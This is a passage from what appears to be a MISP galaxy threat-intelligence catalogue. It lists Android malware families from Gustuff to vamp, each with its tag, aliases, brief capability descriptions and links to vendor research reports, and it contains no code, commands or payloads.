https://blog.talosintelligence.com/2018/10/gplayedtrojan.html
https://blog.talosintelligence.com/2018/10/gplayerbanker.html

Gustuff

Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities. The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.

The tag is: misp-galaxy:malpedia="Gustuff"

Gustuff is also known as:

Table 866. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff
https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html
https://blog.talosintelligence.com/2019/10/gustuffv2.html
https://www.group-ib.com/media/gustuff/
https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html
https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf
https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

HARDRAIN (Android)

The tag is: misp-galaxy:malpedia="HARDRAIN (Android)"

HARDRAIN (Android) is also known as:

Table 867. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain
https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/

HawkShaw

The tag is: misp-galaxy:malpedia="HawkShaw"

HawkShaw is also known as:

Table 868. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw
https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/
https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw

HenBox

The tag is: misp-galaxy:malpedia="HenBox"

HenBox is also known as:

Table 869. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox
https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/
https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

HeroRAT

The tag is: misp-galaxy:malpedia="HeroRAT"

HeroRAT is also known as:

Table 870. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat
https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/

HiddenAd

The tag is: misp-galaxy:malpedia="HiddenAd"

HiddenAd is also known as:

Table 871. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad
https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users
https://twitter.com/LukasStefanko/status/1136568939239137280
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://securelist.com/mobile-malware-evolution-2019/96280/

Hydra

The tag is: misp-galaxy:malpedia="Hydra"

Hydra is also known as:

Table 872. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra
https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/
https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

IPStorm (Android)

Android variant of IPStorm (InterPlanetary Storm).

The tag is: misp-galaxy:malpedia="IPStorm (Android)"

IPStorm (Android) is also known as:

InterPlanetary Storm

Table 873. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm
https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf
https://blog.barracuda.com/2020/10/01/threat-spotlight-new-interplanetary-storm-variant-iot/

IRRat

The tag is: misp-galaxy:malpedia="IRRat"

IRRat is also known as:

Table 874. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat
https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/

JadeRAT

The tag is: misp-galaxy:malpedia="JadeRAT"

JadeRAT is also known as:

Table 875. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat
https://blog.lookout.com/mobile-threat-jaderat

Joker

The tag is: misp-galaxy:malpedia="Joker"

Joker is also known as:

Table 876. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker
https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/
https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451
https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/
https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus
https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks—using-github-to-hide-its-payload.html
https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/
https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html
https://labs.k7computing.com/?p=22199

KevDroid

The tag is: misp-galaxy:malpedia="KevDroid"

KevDroid is also known as:

Table 877. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/
https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html

Koler

The tag is: misp-galaxy:malpedia="Koler"

Koler is also known as:

Table 878. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler
https://twitter.com/LukasStefanko/status/928262059875213312

KSREMOTE

The tag is: misp-galaxy:malpedia="KSREMOTE"

KSREMOTE is also known as:

Table 879. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ksremote
https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/

LittleLooter

The tag is: misp-galaxy:malpedia="LittleLooter"

LittleLooter is also known as:

Table 880. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter
https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/
https://twitter.com/malwrhunterteam/status/1337684036374945792
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf
https://www.youtube.com/watch?v=nilzxS9rxEM

Loki

The tag is: misp-galaxy:malpedia="Loki"

Loki is also known as:

Table 881. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki
http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/

LokiBot

Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.

The tag is: misp-galaxy:malpedia="LokiBot"

LokiBot is also known as:

Table 882. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot
https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view
https://isc.sans.edu/diary/27282
https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/
https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728
https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html

LuckyCat

The tag is: misp-galaxy:malpedia="LuckyCat"

LuckyCat is also known as:

Table 883. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat
https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html

Mandrake

The tag is: misp-galaxy:malpedia="Mandrake"

Mandrake is also known as:

Table 884. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.mandrake
https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf

Marcher

The tag is: misp-galaxy:malpedia="Marcher"

Marcher is also known as:

ExoBot

Table 885. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher
https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware
https://securelist.com/mobile-malware-evolution-2019/96280/
https://www.clientsidedetection.com/exobot_v2_update_staying_ahead_of_the_competition.html[https://www.clientsidedetection.com/exobot_v2_update_staying_ahead_of_the_competition.html]

MazarBot

The tag is: misp-galaxy:malpedia="MazarBot"

MazarBot is also known as:

Table 886. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot
https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html
https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/

Medusa (Android)

According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.

The tag is: misp-galaxy:malpedia="Medusa (Android)"

Medusa (Android) is also known as:

Gorgona

Table 887. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa
https://twitter.com/ThreatFabric/status/1285144962695340032
https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

Meterpreter (Android)

The tag is: misp-galaxy:malpedia="Meterpreter (Android)"

Meterpreter (Android) is also known as:

Table 888. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter
https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe
https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12
https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html

Monokle

Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.

The tag is: misp-galaxy:malpedia="Monokle"

Monokle is also known as:

Table 889. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle
https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

MoqHao

The tag is: misp-galaxy:malpedia="MoqHao"

MoqHao is also known as:

Shaoye
XLoader

Table 890. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao
https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1
https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf
https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681
https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/
https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/
https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html
https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html
https://securelist.com/roaming-mantis-part-v/96250/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

Mudwater

The tag is: misp-galaxy:malpedia="Mudwater"

Mudwater is also known as:

Table 891. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.mudwater
https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf

MysteryBot

MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.

The tag is: misp-galaxy:malpedia="MysteryBot"

MysteryBot is also known as:

Table 892. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot
https://www.threatfabric.com/blogs/mysterybota_new_android_banking_trojan_ready_for_android_7_and_8.html[https://www.threatfabric.com/blogs/mysterybota_new_android_banking_trojan_ready_for_android_7_and_8.html]

OmniRAT

The tag is: misp-galaxy:malpedia="OmniRAT"

OmniRAT is also known as:

Table 893. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat
https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT
https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/
https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co

Oscorp

The tag is: misp-galaxy:malpedia="Oscorp"

Oscorp is also known as:

UBEL

Table 894. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.oscorp
https://cert-agid.gov.it/news/individuato-sito-che-veicola-in-italia-un-apk-malevolo/
https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution

PackChat

The tag is: misp-galaxy:malpedia="PackChat"

PackChat is also known as:

Table 895. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat
https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/

PhantomLance

The tag is: misp-galaxy:malpedia="PhantomLance"

PhantomLance is also known as:

PWNDROID1

Table 896. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance
https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html
https://securelist.com/apt-trends-report-q2-2020/97937/
https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf
https://securelist.com/apt-phantomlance/96772/

PjobRAT

The tag is: misp-galaxy:malpedia="PjobRAT"

PjobRAT is also known as:

Table 897. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat
https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ
https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/
https://labs.k7computing.com/?p=22537

Podec

The tag is: misp-galaxy:malpedia="Podec"

Podec is also known as:

Table 898. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec
https://securelist.com/jack-of-all-trades/83470/

X-Agent (Android)

The tag is: misp-galaxy:malpedia="X-Agent (Android)"

X-Agent (Android) is also known as:

Popr-d30

Table 899. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30
http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/
http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/

Fake Pornhub

The tag is: misp-galaxy:malpedia="Fake Pornhub"

Fake Pornhub is also known as:

Table 900. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub

Premier RAT

The tag is: misp-galaxy:malpedia="Premier RAT"

Premier RAT is also known as:

Table 901. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat
https://twitter.com/LukasStefanko/status/1084774825619537925

Rana

The tag is: misp-galaxy:malpedia="Rana"

Rana is also known as:

Table 902. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.rana
https://blog.reversinglabs.com/blog/rana-android-malware

Raxir

The tag is: misp-galaxy:malpedia="Raxir"

Raxir is also known as:

Table 903. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir
https://twitter.com/PhysicalDrive0/statuses/798825019316916224

RedAlert2

RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim of being notified. As a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.

The tag is: misp-galaxy:malpedia="RedAlert2"

RedAlert2 is also known as:

Table 904. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores
https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html

RemRAT

The tag is: misp-galaxy:malpedia="RemRAT"

RemRAT is also known as:

Table 905. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.remrat
https://blogs.360.cn/post/analysis-of-RemRAT.html

Retefe (Android)

The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim’s phone doesn’t get infected.

The tag is: misp-galaxy:malpedia="Retefe (Android)"

Retefe (Android) is also known as:

Table 906. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe
http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html
https://www.govcert.admin.ch/blog/33/the-retefe-saga
http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html
http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html
http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html
http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/

Riltok

The tag is: misp-galaxy:malpedia="Riltok"

Riltok is also known as:

Table 907. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.riltok
https://securelist.com/mobile-banker-riltok/91374/

Roaming Mantis

The tag is: misp-galaxy:malpedia="Roaming Mantis"

Roaming Mantis is also known as:

Table 908. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis
https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/
https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/
https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/

Rogue

The tag is: misp-galaxy:malpedia="Rogue"

Rogue is also known as:

Table 909. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.rogue
https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/

Rootnik

The tag is: misp-galaxy:malpedia="Rootnik"

Rootnik is also known as:

Table 910. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik
https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer
https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java

Sauron Locker

The tag is: misp-galaxy:malpedia="Sauron Locker"

Sauron Locker is also known as:

Table 911. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker
https://twitter.com/LukasStefanko/status/1117795290155819008

SilkBean

The tag is: misp-galaxy:malpedia="SilkBean"

SilkBean is also known as:

Table 912. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.silkbean
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

Skygofree

The tag is: misp-galaxy:malpedia="Skygofree"

Skygofree is also known as:

Table 913. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree
https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

Slempo

The tag is: misp-galaxy:malpedia="Slempo"

Slempo is also known as:

SlemBunk

Table 914. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo
https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html
https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html

Slocker

The tag is: misp-galaxy:malpedia="Slocker"

Slocker is also known as:

Table 915. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker
https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/
https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/

SmsAgent

The tag is: misp-galaxy:malpedia="SmsAgent"

SmsAgent is also known as:

Table 916. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsagent
https://blog.alyac.co.kr/2128
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/

SMSspy

The tag is: misp-galaxy:malpedia="SMSspy"

SMSspy is also known as:

Table 917. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy

S.O.V.A.

The tag is: misp-galaxy:malpedia="S.O.V.A."

S.O.V.A. is also known as:

Table 918. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova
https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html
https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/

SpyBanker

The tag is: misp-galaxy:malpedia="SpyBanker"

SpyBanker is also known as:

Table 919. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker
https://news.drweb.com/show/?i=11104&lng=en
http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/

SpyC23

The tag is: misp-galaxy:malpedia="SpyC23"

SpyC23 is also known as:

Table 920. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.spyc23
https://www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/

SpyMax

The tag is: misp-galaxy:malpedia="SpyMax"

SpyMax is also known as:

Table 921. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax
https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset
https://twitter.com/malwrhunterteam/status/1250412485808717826
https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league

SpyNote

The tag is: misp-galaxy:malpedia="SpyNote"

SpyNote is also known as:

Table 922. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote
https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr
https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn
https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/
https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/
https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan

StealthAgent

The tag is: misp-galaxy:malpedia="StealthAgent"

StealthAgent is also known as:

Table 923. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent
https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

Stealth Mango

The tag is: misp-galaxy:malpedia="Stealth Mango"

Stealth Mango is also known as:

Table 924. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango
https://www.lookout.com/info/stealth-mango-report-ty

Svpeng

The tag is: misp-galaxy:malpedia="Svpeng"

Svpeng is also known as:

Table 925. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng
https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/
https://securelist.com/mobile-malware-evolution-2019/96280/

Switcher

The tag is: misp-galaxy:malpedia="Switcher"

Switcher is also known as:

Table 926. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher
https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/

TalentRAT

The tag is: misp-galaxy:malpedia="TalentRAT"

TalentRAT is also known as:

Assassin RAT

Table 927. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat
https://www.secureworks.com/research/threat-profiles/platinum-terminal
https://twitter.com/LukasStefanko/status/1118066622512738304

TeleRAT

The tag is: misp-galaxy:malpedia="TeleRAT"

TeleRAT is also known as:

Table 928. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat
https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/

TemptingCedar Spyware

The tag is: misp-galaxy:malpedia="TemptingCedar Spyware"

TemptingCedar Spyware is also known as:

Table 929. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar
https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware

ThiefBot

The tag is: misp-galaxy:malpedia="ThiefBot"

ThiefBot is also known as:

Table 930. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.thiefbot
https://business.xunison.com/thiefbot-a-new-android-banking-trojan-targeting-turkish-banking-users/

TinyZ

The tag is: misp-galaxy:malpedia="TinyZ"

TinyZ is also known as:

Catelites Android Bot
MarsElite Android Bot

Table 931. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz
http://blog.group-ib.com/cron

Titan

The tag is: misp-galaxy:malpedia="Titan"

Titan is also known as:

Table 932. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan
https://blog.lookout.com/titan-mobile-threat
https://www.alienvault.com/blogs/labs-research/delivery-keyboy

Triada

The tag is: misp-galaxy:malpedia="Triada"

Triada is also known as:

Table 933. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada
https://securelist.com/apkpure-android-app-store-infected/101845/
https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/
https://securelist.com/triada-trojan-in-whatsapp-mod/103679/
https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/
https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/
http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html
https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/
https://security.googleblog.com/2019/06/pha-family-highlights-triada.html
https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/
https://securelist.com/mobile-malware-evolution-2019/96280/

Triout

Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.

The tag is: misp-galaxy:malpedia="Triout"

Triout is also known as:

Table 934. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout

Unidentified APK 001

The tag is: misp-galaxy:malpedia="Unidentified APK 001"

Unidentified APK 001 is also known as:

Table 935. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001

Unidentified APK 002

The tag is: misp-galaxy:malpedia="Unidentified APK 002"

Unidentified APK 002 is also known as:

Table 936. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002

Unidentified APK 004

According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.

The tag is: misp-galaxy:malpedia="Unidentified APK 004"

Unidentified APK 004 is also known as:

Table 937. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_004
https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/

Unidentified APK 005

The tag is: misp-galaxy:malpedia="Unidentified APK 005"

Unidentified APK 005 is also known as:

Table 938. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005
https://s.tencent.com/research/report/951.html
https://twitter.com/voodoodahl1/status/1267571622732578816
https://blog.talosintelligence.com/2020/10/donot-firestarter.html
https://community.riskiq.com/article/6f60db72
https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html
https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/

Unidentified APK 006

Information stealer posing as a fake banking app, targeting Korean users.

The tag is: misp-galaxy:malpedia="Unidentified APK 006"

Unidentified APK 006 is also known as:

Table 939. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006
https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20
https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/
https://twitter.com/ReBensk/status/1438027183490940931

vamp

Related to the micropsia windows malware and also sometimes named micropsia.

The tag is: misp-galaxy:malpedia="vamp"

vamp is also known as:

android.micropsia

Table 940. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.vamp
